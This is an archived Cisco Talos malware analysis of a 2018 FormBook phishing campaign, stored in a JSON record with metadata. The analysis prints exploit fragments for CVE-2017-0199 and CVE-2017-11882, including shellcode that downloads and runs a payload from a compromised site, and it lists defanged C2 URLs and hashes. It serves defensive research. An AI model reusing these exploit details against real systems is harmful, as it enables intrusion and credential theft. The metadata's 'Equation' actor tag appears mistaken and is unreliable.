{
	"id": "27ead281-8ede-44d4-a560-dab42e94d9f8",
	"created_at": "2026-04-06T00:19:55.827848Z",
	"updated_at": "2026-04-10T13:11:48.598451Z",
	"deleted_at": null,
	"sha1_hash": "7b95bf37c801604abcc64e3df3e5764f0e51f036",
	"title": "My Little FormBook",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 308809,
	"plain_text": "My Little FormBook\r\nBy Paul Rascagneres\r\nPublished: 2018-06-20 · Archived: 2026-04-05 15:18:42 UTC\r\nWednesday, June 20, 2018 11:00\r\nThis blog post is authored by Warren Mercer and Paul Rascagneres.\r\nSummary\r\nCisco Talos has been tracking a new campaign involving the FormBook malware\r\nsince May 2018 that utilizes four different malicious documents in a single\r\nphishing email. FormBook is an inexpensive stealer available as \"malware as a\r\nservice.\" This means an attacker can purchase a compiled piece of malware based\r\non their desired parameters. This is commonplace with crimeware and stealer type\r\nmalware such as FormBook. It is able to record keystrokes, steal passwords\r\n(stored locally and in web forms) and can take screenshots.\r\nThe author put a lot of effort into the infection vector, using multiple malicious documents in a single phishing\r\nemail. The author also mixed different file formats (PDF and Microsoft Office document) and used two public\r\nMicrosoft Office exploits (CVE-2017-0199 and CVE-2017-11882) in order to drop the final payload on the\r\ntargeted system. The final payload was downloaded during the campaign from a small Japanese file-sharing\r\nplatform (hosted in the Netherlands). The platform owner has since deleted the malicious payload binaries from their\r\nsystem. Here is the infection workflow:\r\nhttps://blog.talosintelligence.com/2018/06/my-little-formbook.html\r\nPage 1 of 12\n\nWe identified an infrastructure overlap between this campaign and a previous campaign we published in February\r\n2017 relating to Pony malware which utilized Microsoft Publisher files to deliver its payload. There is the\r\npotential that the same actor is behind both attacks, due to the overlap in the two campaigns'\r\ninfrastructure. 
If that is the case, the actor could switch between Pony and FormBook to be able to continue their\r\nmalicious activities for more than a year.\r\nInfection Vector\r\nPhishing Campaign\r\nThis campaign starts with a malicious email containing two attachments. Here is a snippet of the\r\nemail:\r\nThe email pretends to be an order sent from the sales department of a company located in Spain. The website's\r\ndetails and phone number appear to have been copied from that of a genuine company.\r\nThe email contains two attachments:\r\nA blank malicious Microsoft Office document template file. (.dotm)\r\nA malicious PDF document that is also blank. (.pdf)\r\nIf an example document from the campaign, named \"STMORDER-442799.dotm,\" is opened, it appears blank.\r\nHowever, like most Office documents, if the file is unzipped and opened, you can access the attributes and XML\r\ninformation. This is where the attacker leverages CVE-2017-0199 to trigger an external download by abusing the\r\nrelationship elements within \"STMORDER-442799\\word\\_rels\\document.xml.rels.\" Despite the file appearing to\r\nbe blank, it does contain a large amount of XML information. We see the \u003cRelationship\u003e elements being abused:\r\n\u003cRelationship Id=\"_id_2970\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\r\nThis will cause the following document to be downloaded and executed from a Japanese file-hosting platform.\r\nAt the time of publishing, this file is no longer available and trying to view it results in a 404 error. The platform\r\nmaintainer of PyonPyon.moe provides a list of malware that has been removed from the hosting platform — this\r\ncan be found here. 
Within this data, we can identify our attempted download of the .doc file, among others related\r\nto this campaign, which were removed on the same day, June 8:\r\nWe were able to obtain multiple .doc files in relation to this campaign, which we will discuss later on. These .doc\r\nfiles are in rich text format (RTF), which leveraged CVE-2017-11882.\r\nPDF document (Attached)\r\nAlso attached to the initial email is a PDF file which contains a JavaScript object:\r\nthis.exportDataObject({ cName: \"mine001.dotm\", nLaunch: 2 });\r\nThis code launches a file embedded within the PDF document. In our case, the file is an Office document named\r\n\"mine001.dotm.\"\r\nSecond Office MalDoc (Embedded)\r\nThe embedded Office document is exactly the same as the attached document discussed above.\r\nWe don't know why the author of this campaign put the same file in two separate locations, or whether\r\nit was on purpose or a mistake made during the phishing generation stage. It's possible the actor did\r\nnot intend to attach both the DOTM and the PDF.\r\nThird Office MalDoc (Downloaded)\r\nThe final malicious Office document is an RTF document. 
This RTF document contains an object\r\nlinking and embedding (OLE) stream at offset 0x9F (header d0 cf 11 e0 a1 b1 1a e1):\r\n00000040 36 39 30 36 64 30 34 33 30 32 30 30 30 30 30 30 |6906d04302000000|\r\n00000050 31 37 30 30 30 30 30 30 37 32 34 37 35 35 33 30 |1700000072475530|\r\n00000060 33 32 37 37 34 65 37 35 36 64 37 36 33 36 34 66 |32774e756d76364f|\r\n00000070 35 30 36 66 36 32 34 62 37 34 35 38 34 37 33 32 |506f624b74584732|\r\n00000080 37 36 35 31 30 30 30 30 30 30 30 30 30 30 30 30 |7651000000000000|\r\n00000090 30 30 30 30 30 30 30 30 31 30 30 30 30 30 64 30 |00000000100000d0|\r\n000000a0 63 66 31 31 65 30 61 31 62 31 31 61 65 31 30 30 |cf11e0a1b11ae100|\r\n000000b0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|\r\n000000c0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 65 |000000000000003e|\r\n000000d0 30 30 30 33 30 30 66 65 66 66 30 39 30 30 30 36 |000300feff090006|\r\n000000e0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|\r\n000000f0 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 31 |0000000100000001|\r\n00000100 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|\r\nWe have the beginning of the OLE compound file (CF) — named OLECF — object.\r\nThis OLECF object contains a compound file binary format (CFBF) object. This file format is described here. This\r\nobject is linked to the COM object \"0002ce02-0000-0000-c000-000000000046\":\r\n00000400 52 00 6f 00 6f 00 74 00 20 00 45 00 6e 00 74 00 |R.o.o.t. 
.E.n.t.|\r\n00000410 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 |r.y.............|\r\n00000420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n00000440 16 00 05 00 ff ff ff ff ff ff ff ff 01 00 00 00 |................|\r\n00000450 02 ce 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 |...............F|\r\n00000460 00 00 00 00 00 00 00 00 00 00 00 00 d0 e9 36 77 |..............6w|\r\n00000470 7f fc d3 01 03 00 00 00 c0 07 00 00 00 00 00 00 |................|\r\n00000480 01 00 4f 00 6c 00 65 00 31 00 30 00 4e 00 61 00 |..O.l.e.1.0.N.a.|\r\n00000490 74 00 69 00 76 00 65 00 00 00 00 00 00 00 00 00 |t.i.v.e.........|\r\n000004a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\nThis CLSID is the ID of the Equation Editor as mentioned by Microsoft. Finally, here is where and how the\r\nexploit is executed:\r\n00000800 98 07 00 00 03 d4 01 6a 72 0a 01 08 7f a9 b8 c3 |.......jr.......|\r\n00000810 42 ba ff f7 d0 8b 38 8b 37 bd c6 98 b9 ff f7 d5 |B.....8.7.......|\r\n00000820 8b 4d 77 56 ff d1 05 63 d6 2d 0b 2d 4d d5 2d 0b |.MwV...c.-.-M.-.|\r\n00000830 ff e0 fa d3 6e 4a c9 6a 83 53 e8 d1 41 00 1e b6 |....nJ.j.S..A...|\r\n00000840 29 1d e6 71 de 92 60 23 40 9d 40 0e 7a d8 9a d6 |)..q..`#@.@.z...|\r\n00000850 26 43 86 98 e0 c4 4e b8 1d 7d 82 46 ce 45 07 be |\u0026C....N..}.F.E..|\r\n00000860 82 15 f0 31 ec 1e 49 93 a2 d4 ef b5 da ae e8 39 |...1..I........9|\r\n00000870 ff d3 ab 65 88 29 2b 4e be b9 ec 16 e5 7f ab d6 |...e.)+N........|\r\n00000880 08 a7 ec 69 51 38 1f 97 27 27 7d f9 f3 f2 65 83 |...iQ8..''}...e.|\r\nThe red value is the stream length.\r\nThe blue value is the Equation Editor MTEF header, starting with 0x3.\r\nThe green value is the font record, starting with 0x8. This vulnerability is an overflow on the font name located in\r\ngrey in the snippet above. 
The overflow will redirect the flow in order to execute the RET code at the address\r\n0x0041d1e8 (in pink).\r\nFinally, a shellcode is executed.\r\nHere is the first stage of the shellcode:\r\nuser@laptop:$ rasm2 -d B8C342BAFFF7D08B388B37BDC698B9FFF7D58B4D7756FFD10563D62D0B2D4DD52D0BFFE0\r\nmov eax, 0xffba42c3\r\nnot eax\r\nmov edi, dword [eax]\r\nmov esi, dword [edi]\r\nmov ebp, 0xffb998c6\r\nnot ebp\r\nmov ecx, dword [ebp + 0x77]\r\npush esi\r\ncall ecx\r\nadd eax, 0xb2dd663\r\nsub eax, 0xb2dd54d\r\njmp eax\r\nThe purpose is to execute GlobalLock() (first call) and to finally jump into the second stage of the shellcode, in bold\r\norange in the hexadecimal code.\r\nThe purpose is to download and execute a binary located on a compromised WordPress website\r\n(hxxp://irishlebanese[.]com/wp-admin/images/eight/mine001.exe).\r\nFormBook is an inexpensive stealer available as \"malware as a service.\" It is able to record keystrokes, steal\r\npasswords (stored locally and in web forms) and can take screenshots. This post does not describe the malware in-depth, since there are excellent posts on the malware written by other researchers.\r\nOverlaps with previous campaigns\r\nIn February 2017, we published an article about another stealer using Publisher\r\n
We found three interesting samples\r\nrelated to this case and our current FormBook case:\r\n5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825 (located at\r\nhxxp://irishlebanese[.]com/wp-admin/admin/dor001.exe in May 2018)\r\n82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794 (located at\r\nhxxp://irishlebanese[.]com/wp-admin/admin/mine001.exe in May 2018)\r\n8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72 (located at\r\nhxxp://irishlebanese[.]com/wp-admin/admin/mine001.exe in May 2018)\r\nThese three samples use the same FormBook infrastructure and the Pony infrastructure mentioned in our previous\r\narticle:\r\nhxxp://alphastand[.]top/alien/fre.php -\u003e command and control (C2) server from 2017\r\nhxxp://ukonlinejfk[.]ru/mine/fre.php\r\nhxxp://alphastand[.]trade/alien/fre.php -\u003e C2 server from 2017\r\nhxxp://igtckeep[.]com/dor/fre.php\r\nhxxp://alphastand[.]win/alien/fre.php -\u003e C2 server from 2017\r\nhxxp://kbfvzoboss[.]bid/alien/fre.php -\u003e C2 server from 2017\r\nhxxp://www.cretezzy[.]com/do/ -\u003e FormBook C2 server\r\nhxxp://www.beemptty[.]com/se/ -\u003e FormBook C2 server\r\nThe infrastructure sharing suggests that this is a common actor currently using two different stealers. Based on the\r\ntimeline, we assume that the actor is currently moving from Pony to FormBook, another stealer.\r\nConclusion\r\nThis case shows us that malicious actors play with multiple file formats and\r\nembedded objects. In this campaign, the author used a PDF with an embedded\r\nOffice document template using a vulnerability in order to download an additional\r\nOffice RTF document, and then a second vulnerability and exploit in order to\r\ncompromise the target. The attacker used an unfamiliar file-sharing platform in\r\norder to store the malicious document and a compromised WordPress site in order\r\nto store the final payload. 
We did notice that the file-sharing platform is reactive,\r\nremoving the malicious files quickly, stopping the infection chain.\r\nSome technical elements, such as infrastructure sharing, show us that the actor behind this campaign is probably\r\nthe same actor behind a campaign we described one year ago. Last month it used two stealers in parallel on the\r\nsame infrastructure. Based on the information we have today, he/she no longer uses Pony, but switched to\r\nFormBook in order to steal information on compromised systems.\r\nCoverage\r\nAdditional ways our customers can detect and block this threat are listed below.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these\r\nthreat actors.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious\r\nwebsites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention\r\nSystem (NGIPS), and Meraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOCs\r\nPDF\r\n8f859c1a9965427848315e9456237e9c018b487e3bd1d632bce2acd0c370341e\r\nEmbedded And Attached dotm\r\n04f093a3b867918dce921fe2ba40dcdae769b35dbce3047aacdb151e2208ea5c\r\nMalicious Document Hosted On The File-Sharing Platform\r\n4c16046966a5fd06c84213aa67bfa37949800980915e9b511384ec17dc7eb7b1 -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/pajelx.doc\r\n04f093a3b867918dce921fe2ba40dcdae769b35dbce3047aacdb151e2208ea5c -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc\r\n59cf77148cbbf24d395d09192ce43ac5395087f3e499cda350e3a93f13e37de1 -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/btgppc.doc\r\nD83f874dda2fa3e4339399c786e9497c1b440019fa5ee5925738fc3afa67352c -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/ejmhsu.doc\r\n35ea3d8272751d60bd3106e548444588b1959622dfdcf11be14b80786bdb25e6 -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/cnlvop.doc\r\n5e9979a9676889a6656cbfa9ddc1aab2fa4b301155f5b55377a74257c9f9f583 -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/hbhjks.doc\r\n0b0615eb8e4c91983fab37475ecc374f79c394768a33ea68c2208da1c03e5a43 -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/zkxsam.doc\r\nFccc874f4f741231673f5a3c0bdc4c6bfd07f1b1e93f7c64e2015c393966216e -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/neitsj.doc\r\n13ce56581c8ad851fc44ad6c6789829e7c250b2c8af465c4a163b9a28c9b8a41 -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/lhvazm.doc\r\n541ea322a3a6385211566f95cef333580a62341dac397e044a04504625acdd0d -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc\r\n062ae7152d8e8f3abb093e55c5a90213134dd278ac28cfeb18e81132232dcbe8 -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/tewkco.doc\r\n0ddf7e87957932650679c99ff2e2380e2be8a203d1142f19a22ad602047f372e -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/lhvazm.doc\r\n1debc4e22a40f4f87142e7e40094ce1a9aa10462f0c6d1c29aa272d7d6849205 -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/zkxsam.doc\r\nPE32 Hosted On The irishlebanese 
Website\r\nd7f0f3fea2f9935c1dd7bda343ec1e3fb77457e68b16b9d51516a3d8c651d14f\r\n05a945fc7a9eb4c9a4db8eb974333b3938c06d9299976075b2fc00a79cf0a129\r\n91a471ba534219f05c31d204b3c5217cde7c67f70600aa3abba334888f628376\r\nf7e97000615ee77093c4ec49f3cbe4b8cb3dc6feafc74ae8d59f01f05dc4280e\r\n23c40f55797b07b2d9bf1e314ea928b1151af2b2e605aa520a715fe56e481528\r\n1d706a3c85973fe96240a254abff52c0593b4aa0c283d3ecc28df6f8baed853b\r\ne8f0136abc46b668d44586a6b5a394b470af6af8e9d91bddca4b70e3e66768d1\r\n958ee876ebaab71ea2ef9fcda6a08598319578ccc1f4bd9baa3a54114b88abdc\r\nb031075b8ad2558ee3ee7f0749c2b24484dd6fab7252fad71548276514b9b766\r\n667cc420816fd71ae54869b4c0f05129cc5972dbc47f7a98776fc63a72d77691\r\n7db8273fd25088900cffa036eb631ffcee40302dd7b33a7d4f3e653e7ab091c0\r\n3efdc8b15e324cd9323cdbd34fbd19979d6eeb95fe1120ed3a95dc24fab67397\r\n189e2494b19773f9b72072774891378f5809c7bfb121dcba2cee13e6f91ed619\r\nbd44861de18d5bbf71d2d64e29ff9f1d8495f97f5ba0b49eacb504b3768a89bb\r\ne0282f51ac3bfba5774893c8b70c31600d7e4bd7f6d7231fd33315396cd18b78\r\n83fa11d8711ef22437681e09a4be500cfaf49ac7cb29837ff6a42fb46b09d789\r\n14ce215b561dc43104e400c0eb877d876f6e9be77c5b2994b9b8745b2132d914\r\n226d38382415b935d849539c0b6305a4259c26dfa7317b944f8498cd3e65850f\r\ndd1eeb128b1d1eb40e74281aec79828d7d7179a0375bda5e85ce5fd2fac064a2\r\na7422eddb437a33d730ab70bd1267d815fc3761d5eda9781de91d0bdeeb823ff\r\n2a21f728282b33b89e6cbd99db52651931b534be9837d99eacf87cfd748c3cba\r\n91b6219f4a8903773492fd83fe02e6aa8729e378f559c5cc9f115a2304f89e57\r\n4f73923c23354ac5050f012f607342362eaf1d691ce1b64ea1e831038cc4236c\r\nebbed2fcd7fe4dc8a95cc60ab9c8e98609bcf3ba5696507252c65cc6be748b14\r\nd1f9549943b936ba54d87a5befd2d241fcddac6f0caf8c786f6034ab18b8e61d\r\nae7cacc7a16cb48cb40473ad0269331c392f8eb0fef8ebe2d90f3592fccb306c\r\n00cb817330768b33a30bcf7a6a67d0269aa32f8099aee3ecd18da0e31d096610\r\ne93994bf78b13d3bdee1682faf6c6544246fbd6d95a0aa043ac175ad0b905646\r\n822c1239203db0bfdde3d0b65f50e53f7ee155638d4743b14f58267fa3e76531\r\n5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825\r\n8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72\r\n82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794\r\nC2 Servers\r\nhxxp://www[.]drylipc[.]com/em1/\r\nhxxp://www[.]handanzhize[.]info/d5/\r\nhxxp://www[.]bddxpso[.]info/d7/\r\nhxxp://www[.]newraxz[.]com/as/\r\nhxxp://www[.]atopgixn[.]info/de8/\r\nhxxp://www[.]cretezzy[.]com/am/\r\nhxxp://www[.]casiinoeuros[.]info/d3/\r\nhxxp://www[.]newraxz[.]com/as/\r\nhxxp://www[.]cretezzy[.]com/do/\r\nhxxp://www[.]newraxz[.]com/as/\r\nOverlaps Samples\r\n5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825\r\nhxxp://alphastand[.]top/alien/fre.php\r\nhxxp://alphastand[.]trade/alien/fre.php\r\nhxxp://igtckeep[.]com/dor/fre.php\r\nhxxp://alphastand[.]win/alien/fre.php\r\nhxxp://kbfvzoboss[.]bid/alien/fre.php\r\nhxxp://www[.]cretezzy[.]com/do/\r\n8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72\r\nhxxp://ukonlinejfk[.]ru/mine/fre.php\r\nhxxp://alphastand[.]top/alien/fre.php\r\nhxxp://alphastand[.]trade/alien/fre.php\r\nhxxp://alphastand[.]win/alien/fre.php\r\nhxxp://kbfvzoboss[.]bid/alien/fre.php\r\nhxxp://www[.]beemptty[.]com/se/\r\n82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794\r\nhxxp://ukonlinejfk[.]ru/mine/fre.php\r\nhxxp://alphastand[.]top/alien/fre.php\r\nhxxp://alphastand[.]trade/alien/fre.php\r\nhxxp://alphastand[.]win/alien/fre.php\r\nhxxp://kbfvzoboss[.]bid/alien/fre.php\r\nhxxp://www[.]beemptty[.]com/se/\r\nSource: https://blog.talosintelligence.com/2018/06/my-little-formbook.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2018/06/my-little-formbook.html"
	],
	"report_names": [
		"my-little-formbook.html"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434795,
	"ts_updated_at": 1775826708,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7b95bf37c801604abcc64e3df3e5764f0e51f036.pdf",
		"text": "https://archive.orkl.eu/7b95bf37c801604abcc64e3df3e5764f0e51f036.txt",
		"img": "https://archive.orkl.eu/7b95bf37c801604abcc64e3df3e5764f0e51f036.jpg"
	}
}